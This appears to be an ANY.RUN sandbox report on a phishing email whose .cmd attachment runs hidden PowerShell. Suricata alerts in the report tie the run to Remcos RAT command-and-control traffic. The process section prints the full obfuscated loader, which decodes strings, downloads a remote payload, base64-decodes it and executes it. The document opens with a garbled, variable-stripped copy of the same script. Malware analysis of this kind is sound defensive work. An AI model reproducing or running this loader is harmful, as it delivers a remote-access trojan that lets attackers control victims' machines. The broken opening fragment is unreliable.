);=[0];=(paik ' War.lpGSpril orsOTot.bdoriaDo dlObol:Bus SFou tlegeaFuzzt E nIMorfOAffanHalfsfarvFProaoeg ir VejsSnitTNovia ArbNFrilD.laneC loRDefiSMega=godkN TelEUdplW Gut-GeheOKonobEl vJ F,reMa,cC Fo tDelg .anSPestyV deSLngdTsekuEMairMfrij. Lot,tcSMitiS GeneB kpn');Lempninger ();Lempninger (paik 'None SSu et rosaSalttOp,qiPrenoUrfjn ch sCitef.foro KulrSndesperstBlodaSchenunildUndeeBagarEpausUnde.Sl eHSukkefluea ulndFilieRen,rShrisData[Paci.WMagni Equn antgfrivbOvereMagnaGenttEsrosPara] ilb=Haus$.imuG Fo,rExcia I edGlauaBystt AfriBeleoUnwrnAffaa enetUndie RoslBrney');=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';=paik 'pmsg$ ydrSP litPolya atatB,rbiVi uoSaunn Fjosno af Derod rmr TecsH rvtH eraMetan Sy ddal eSus,rlstes Pol.S gn coHBranvFir iNedsrTankv crue heclSminsBrdntEje rSommoSamfeMuslmE ghmIdeneBoolnUnin. LizIPri nBanavDupnoUnh kCardeSt n( Ger.tvM famu lkl,akst I diThrosT.yktdinnoTanqrFluee,renyNonf,Deno$ B vP Elliau,ynF orkdivieInderUnbusNeks)';=;Lempninger (paik 'Bal. I cLAfsnO tribVaneA.onilNysk: InwA U,ar rreiLu asSkrikCheaeUngr=Voks(H.mlTTilseProvs stetindi-FlegpM.liA B,oTBeskHB,fr Boh tipTr tI WatNNonbKH ndeBijarCherSApp )');while (!) {Lempninger (paik 'Tamb.egnl,ippoUnbabSluka eaclUds :Na uR ommrHonoiSubag gtesA git eli=S,ke DFornlSls e vins') ;Lempninger ;Lempninger (paik ' Pyg[PoleTSupehmeilRHo.hE .nmaAudiDWeltIC luntr mgPunn.SvigTSddoHNonirkaree UnwaRaaddMedd] Bog:.ale:Ha mSLinolTotae vise StapJus.(Z.nc4 Hal0 Dow0no t0Tilb)');Lempninger (paik 'D,te$ B sgM taLkun oAdreB egoAGrail Una:CoppaEc iRSulpiUngdS A.tkJagtE nkl=Agor(SgnitUnstEEbelS ccotMeno-RdnbpSurraPicot InsHoryx Asti tip uppIWi sn AfvkSalaEMillR aveS Sa.)') ;Lempninger (paik '.iki ympLKviko eribRe fa Pa LParl:ElecS JackDislUtrkbmpaomLZa,ceImplSCuar=Brom$ Ti GFruglTechOGrinB t iaBegyLSnks:bartfRettLCampUMisdeGeheF Hori aboS ManK M ne mgr Di EBranSudso+Se l+Mi,j%%Milj,sM pero Ba LC rroUkuegKo biS.usSCemeiRus NF rpGDe e.Eme cFinno OveuAksiNImmot') ;=[]}=382880;=28663;Lempninger (paik ' Acr rGspleLStvfOjo dBGruna .omlDelt:FacevD pnEMaltXRevoApothTFodbILazuOPostNSy.fsHelt Feel= nva Tiltg ukkeProsT,nsu-.dskcFrosoKlisNUndeT,hysE GraN ishtDrum bal PteiSkrin KomkR,vee Bu rWests');Lempninger (paik 'Sokk$ SalgBesmlToucoRnnebTatoaIntelMund:PagaR roa ca tDkn hTreso St,lInveeSublsDokt Triu= Tee Konv[ BoyS,unfyBrucsjagttPr ieIllumNons.Umr CTilfoDatanFrysv D deDi krCountOver]B,st:Laye:OogoFButtrsprgoVoldmSu.eBUn.xaS agsm due lde6Told4MetaSTobat tacrDiskiDespnInsigCulo( Pur$ weVBra esubtxInfaaRasetBackiPerioHal.nKno sRund)');Lempninger (paik '.lut GRitulTo loP imb eubaKnopl neu:LangF Marj Ka,eMartr P ld UdsIFaldNC mmGpiz SSo s Bea =d ft ,ade[MykosObedyAnlbSGoest.terE pimFa.s.EnuctTimeEGu.lXHvidT Im .Bo tETeknns jecT piOopfrD ystIBrndnWittgAncy]Skov:Livs:Sla a P rs IncCTe riRekliAfka. OblGM nnEBrugt NorS,lutTBillrSamfiSt nNStjrG ,ak(Blep K,mt.preH scaOB onlC naESty sDarr)');Lempninger (paik 'Kies.radb.elmaStukL Tak:brnea U msPrisPSieveTragrPipeGOrgaiSysilS ralSvrmi ndefDo ioTilmr opsMPack=c mp fClotJCauseUdlur be,dSclei SednNonsGSkatsP pe.VkstSLi rURektbTyroSres t ljeRDekaII dvnOv rGKnko( Ove$ Humt Antrl,teIRapnk idde Sle2.rfo2 F.n5 Poz,S.ks PNon acronR AppaC rcTSupeAHypok Gevt De i AccSma.nkmaadeU rm)');Lempninger ;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
2268\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3156"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
2
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
4000powershell.exe -windowstyle hidden "Get-ChildItem;Get-Service;$Baadlngderne=(gcm A:).CommandType;$Baadlngderne=[String]$Baadlngderne;$Skobrster='Cordialises';$Baadlngderne+=':';(n`i -p $Baadlngderne -n paik -value { param ($Atocia39);$Skobrster='Arbejdsopgaver';$Hjemmesiden=4;$Smurks='Sarin';do {$Shingling+=$Atocia39[$Hjemmesiden];$Hjemmesiden+=5} until(!$Atocia39[$Hjemmesiden])$Shingling});(n`i -p $Baadlngderne -n Lempninger -value {param ($Nephralgic);.($Demonographies123) ($Nephralgic)});ConvertTo-Html;$Skossen=paik ' KbsN Ho EGrdhTVred.BuniW';$Skossen+=paik 'A teeT,rfBContcTy nL Wavi GraEAlenND ant';$Gradationately=paik '.rteMSpisobevezD.taiM,dilBajolBlaaaSha /';$Poligarship=paik 'RekrTAzoxlPrecs itt1Sjus2';$Smugleri='Spli[BeloNAppeE.kovTM,da.TikiSPr.vEArraRSokkV dleiDrabcAt.rETuvapHandoCannINex nDex T Sarm MycAP ogNGrntAGu,zg SecESkygRInco]Inda:Rott:rallS ,rueBorgCMi.aUOsphR.rodi nttSatuYTalePLum R SkroSja.t PreOU dic Ko OstrilOver= Rea$WeazPPm soAntelJenkiF,nggFarta D mrTrans,smeh BerIUdtaP';$Gradationately+=paik ' Bro5 lek.Ri c0Ind nd(,equW GoliSmo.nEksedTallorosiwSuprsFors EupN Fo TBoks Vrdi1.jrs0Mini.qu.a0Evne;Infr Ac.uWF ldiSymbnCu s6Samm4 Mar;Canr U.skxfuld6 M f4 Tvr;Nytt GstrSoldvUnca:Unlo1O.er3Alca7 Ana.K,ig0Tred),lin KresGWoote .idc BeskByggoP ut/For 2Stig0Bund1Sd k0R gs0 len1Bran0O,er1Teks BrnF AnkiCassr PseeAktif MiloU dexBags/ esu1 ust3 Pt 7Mari.Ocea0';$Wingbeats=paik 'Gr gUAltasAngieSp nrbarb-Konsa derGCyn.EI senF ret';$Multistorey=paik ' FryhDethtRegntPolypEkspsNitt:Slu,/F re/ Je bDis aFo.rn C lgJackl Z raMi hd BameOr.dsLil hAutoc haneT.ygnArkatBengr co.aRecelTroppudfrrAnt eUgels,ilis avcRougl.egauMonebSpnd. Pascdat.oBeklmPfun/diagPGabiiTastnBrn.d KseeKontrFakuiVen 1 Ove7fo t0Down.dierc Coah Belm';$Resealed=paik 'Hype>';$Demonographies123=paik ' .upIQu nETyvtX';$Prisniveauernes='Noddles';$Shmoozes='\Fricative.Han';Lempninger (paik 'Stap$BrangSteglDr pORegebAfgaA EvoL Agt:RefoBMe ir.ipsiSociXdismvhaploThalL,elsDFarv= Tor$ TruEBegnnMoraVRu a: npraImpoPDo,uP SrgdForbaCisttHys.As rt+Brnd$BehaSPresHAntiMUnlioBipaO ,utZNonaeOrtos');Lempninger (paik 'Edda$DigegS meLDichoPantbSiljaNajaL S m:Ca,ghHalvo romLandOVrool,ichOEso GOverIGut SAnsti Rovn norgAfsk=Wohl$Ad,pmN.elUSodol Itst SkoIOps s onnTOmnooDeprr tarEInteYAsse.Ro.lsRaa,P.tatL rinIVej.tsor.( B g$FatoRKendE Zi,S sw eI.niaNayaLBlabeSocidGand)');Lempninger (paik $Smugleri);$Multistorey=$Homologising[0];$Schizogregarine=(paik ' War$Y.lpGSpril orsOTot.bdoriaDo dlObol:Bus SFou tlegeaFuzzt E nIMorfOAffanHalfsfarvFProaoeg ir VejsSnitTNovia ArbNFrilD.laneC loRDefiSMega=godkN TelEUdplW Gut-GeheOKonobEl vJ F,reMa,cC Fo tDelg .anSPestyV deSLngdTsekuEMairMfrij. Lot$BituspeopKUnwaoO,tcSMitiS GeneB kpn');Lempninger ($Schizogregarine);Lempninger (paik 'None$Kol SSu et rosaSalttOp,qiPrenoUrfjn ch sCitef.foro KulrSndesperstBlodaSchenunildUndeeBagarEpausUnde.Sl eHSukkefluea ulndFilieRen,rShrisData[Paci$Int.WMagni Equn antgfrivbOvereMagnaGenttEsrosPara] ilb=Haus$.imuG Fo,rExcia I edGlauaBystt AfriBeleoUnwrnAffaa enetUndie RoslBrney');$Hvirvelstroemmen=paik 'T,skDEskaoSmaawCra.n embl Trao aria CridTokaFLvefiBrnelSupie';$formularise=paik 'pmsg$ ydrSP litPolya atatB,rbiVi uoSaunn Fjosno af Derod rmr TecsH rvtH eraMetan Sy ddal eSus,rlstes Pol.S gn$U coHBranvFir iNedsrTankv crue heclSminsBrdntEje rSommoSamfeMuslmE ghmIdeneBoolnUnin. LizIPri nBanavDupnoUnh kCardeSt n( Ger$L.tvM famu lkl,akst I diThrosT.yktdinnoTanqrFluee,renyNonf,Deno$ B vP Elliau,ynF orkdivieInderUnbusNeks)';$Pinkers=$Brixvold;Lempninger (paik 'Bal.$Vangg I cLAfsnO tribVaneA.onilNysk: InwA U,ar rreiLu asSkrikCheaeUngr=Voks(H.mlTTilseProvs stetindi-FlegpM.liA B,oTBeskHB,fr Boh $a tipTr tI WatNNonbKH ndeBijarCherSApp )');while (!$Ariske) {Lempninger (paik 'Tamb$Ditig.egnl,ippoUnbabSluka eaclUds :Na uR ommrHonoiSubag gtesA git eli=S,ke$gev DFornlSls e vins') ;Lempninger $formularise;Lempninger (paik ' Pyg[PoleTSupehmeilRHo.hE .nmaAudiDWeltIC luntr mgPunn.SvigTSddoHNonirkaree UnwaRaaddMedd] Bog:.ale:Ha mSLinolTotae vise StapJus.(Z.nc4 Hal0 Dow0no t0Tilb)');Lempninger (paik 'D,te$ B sgM taLkun oAdreB egoAGrail Una:CoppaEc iRSulpiUngdS A.tkJagtE nkl=Agor(SgnitUnstEEbelS ccotMeno-RdnbpSurraPicot InsHoryx Asti$A tip uppIWi sn AfvkSalaEMillR aveS Sa.)') ;Lempninger (paik '.iki$Anakg ympLKviko eribRe fa Pa LParl:ElecS JackDislUtrkbmpaomLZa,ceImplSCuar=Brom$ Ti GFruglTechOGrinB t iaBegyLSnks:bartfRettLCampUMisdeGeheF Hori aboS ManK M ne mgr Di EBranSudso+Se l+Mi,j%Milj$EvalHSishOHe,sM pero Ba LC rroUkuegKo biS.usSCemeiRus NF rpGDe e.Eme cFinno OveuAksiNImmot') ;$Multistorey=$Homologising[$Skumles]}$Trike225=382880;$Parataktiske=28663;Lempninger (paik ' Acr$As rGspleLStvfOjo dBGruna .omlDelt:FacevD pnEMaltXRevoApothTFodbILazuOPostNSy.fsHelt Feel= nva Tiltg ukkeProsT,nsu-.dskcFrosoKlisNUndeT,hysE GraN ishtDrum bal$FortP PteiSkrin KomkR,vee Bu rWests');Lempninger (paik 'Sokk$ SalgBesmlToucoRnnebTatoaIntelMund:PagaR roa ca tDkn hTreso St,lInveeSublsDokt Triu= Tee Konv[ BoyS,unfyBrucsjagttPr ieIllumNons.Umr CTilfoDatanFrysv D deDi krCountOver]B,st:Laye:OogoFButtrsprgoVoldmSu.eBUn.xaS agsm due lde6Told4MetaSTobat tacrDiskiDespnInsigCulo( Pur$ weVBra esubtxInfaaRasetBackiPerioHal.nKno sRund)');Lempninger (paik '.lut$frs GRitulTo loP imb eubaKnopl neu:LangF Marj Ka,eMartr P ld UdsIFaldNC mmGpiz SSo s Bea =d ft ,ade[MykosObedyAnlbSGoest.terE pimFa.s.EnuctTimeEGu.lXHvidT Im .Bo tETeknns jecT piOopfrD ystIBrndnWittgAncy]Skov:Livs:Sla a P rs IncCTe riRekliAfka. OblGM nnEBrugt NorS,lutTBillrSamfiSt nNStjrG ,ak(Blep$LutiRRetsa K,mt.preH scaOB onlC naESty sDarr)');Lempninger (paik 'Kies$SejlGLloylEfovO.radb.elmaStukL Tak:brnea U msPrisPSieveTragrPipeGOrgaiSysilS ralSvrmi ndefDo ioTilmr opsMPack=c mp$Ska fClotJCauseUdlur be,dSclei SednNonsGSkatsP pe.VkstSLi rURektbTyroSres t ljeRDekaII dvnOv rGKnko( Ove$ Humt Antrl,teIRapnk idde Sle2.rfo2 F.n5 Poz,S.ks$Dis PNon acronR AppaC rcTSupeAHypok Gevt De i AccSma.nkmaadeU rm)');Lempninger $Aspergilliform;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
Total events
51 463
Read events
50 231
Write events
1 084
Delete events
148

Modification events

(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsData
Operation:writeName:SessionId
Value:
56265D7A-5ED6-425A-A9D7-63C554BB0212
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics
Operation:delete valueName:BootFailureCount
Value:
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Preferences
Operation:delete valueName:ChangeProfileOnRestart
Value:
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046
Operation:writeName:00030429
Value:
09000000
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsData
Operation:writeName:ProfileBeingOpened
Value:
Outlook
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046
Operation:writeName:00030397
Value:
60000000
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\outlook
Operation:writeName:BuildNumber
Value:
16.0.16026
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs
Operation:writeName:CountryCode
Value:
std::wstring|GB
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook
Operation:writeName:Expires
Value:
int64_t|0
(PID) Process:(6640) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\outlook
Operation:delete valueName:ConfigIds
Value:
Executable files
3
Suspicious files
17
Text files
25
Unknown types
0

Dropped files

PID
Process
Filename
Type
6640OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook1.pst
MD5:
SHA256:
6640OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbresbinary
MD5:94712AC9E633FB87CCD660068323AF29
SHA256:4036287EFC86774E7312F092DF9CDF0B25DEE0D39B4364A67FDBF5351F7B50FF
6640OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_TableViewPreviewPrefs_2_D8B13DC3A8DF9045BC2148D57D50BDC5.datxml
MD5:0E092DB99AEE99FDFF9B5B222C732CFD
SHA256:D1614AD99ADED9F6F5C1BE7FE7FFA5124BD04A526580DA3818EA8A954E852AA6
7800powershell.exeC:\Users\admin\AppData\Roaming\Fricative.Hantext
MD5:31A9AA907626CA9107A2B3E2F8EF31F8
SHA256:52503EF8AC34B54E2C4C41E660E3FBA7497121111802441D7F54C600169F86E9
7540WinRAR.exeC:\Users\admin\Desktop\00105026025_pdf.cmdtext
MD5:98C719508191B81ACEE1F73AC8AA2861
SHA256:D441C3CD548BB3D660F7976F6731C78F9FC77CE8340D5C52DDDEA92D7A06E32D
6640OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmbinary
MD5:3039BB0F93B6AC67B53715156AD86886
SHA256:B26D29B3EFF62AFC8AFD0E9EAF407BD44C04DA421820B1342EB40DFC6710BEBB
6640OUTLOOK.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9binary
MD5:624905F2280E3EEFBFFBB33691490E07
SHA256:F8170545AF8633D689EBB3910EA9D4459D705FE0322524A9BDE9C65D2320EF34
6640OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\ZR27YI25\00105026025_pdf.gz:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
6640OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\AddInClassifierCache\OfficeSharedEntitiesUpdated.bintext
MD5:552E258BC8E54A3FC22A6D610AEA8E02
SHA256:B5F3D8DED6833EE83BE838685E8E259A2387B8C282373959411B36E1105C704D
7800powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:469861429ADC5C00C94CD2E2967D4031
SHA256:37CC331DE30629167D52A23519075EB2DC18C8E3622A6524BC51E7500DA8E319
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
43
DNS requests
26
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.53.40.176:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
2104
svchost.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6640
OUTLOOK.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6640
OUTLOOK.EXE
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
7264
msiexec.exe
GET
200
2.19.105.127:80
http://x1.c.lencr.org/
unknown
whitelisted
7600
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.53.40.176:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
6640
OUTLOOK.EXE
52.123.128.14:443
ecs.office.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6640
OUTLOOK.EXE
52.109.68.129:443
roaming.officeapps.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 23.53.40.176
  • 23.53.40.178
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
ecs.office.com
  • 52.123.128.14
  • 52.123.129.14
whitelisted
roaming.officeapps.live.com
  • 52.109.68.129
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
omex.cdn.office.net
  • 23.48.23.42
  • 23.48.23.11
  • 23.48.23.18
  • 23.48.23.30
whitelisted
messaging.lifecycle.office.com
  • 52.111.236.4
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
7264
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
2196
svchost.exe
Misc activity
ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
7264
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
7264
msiexec.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
7264
msiexec.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
92093672-f98f-3255-101c-e031e624c481.eml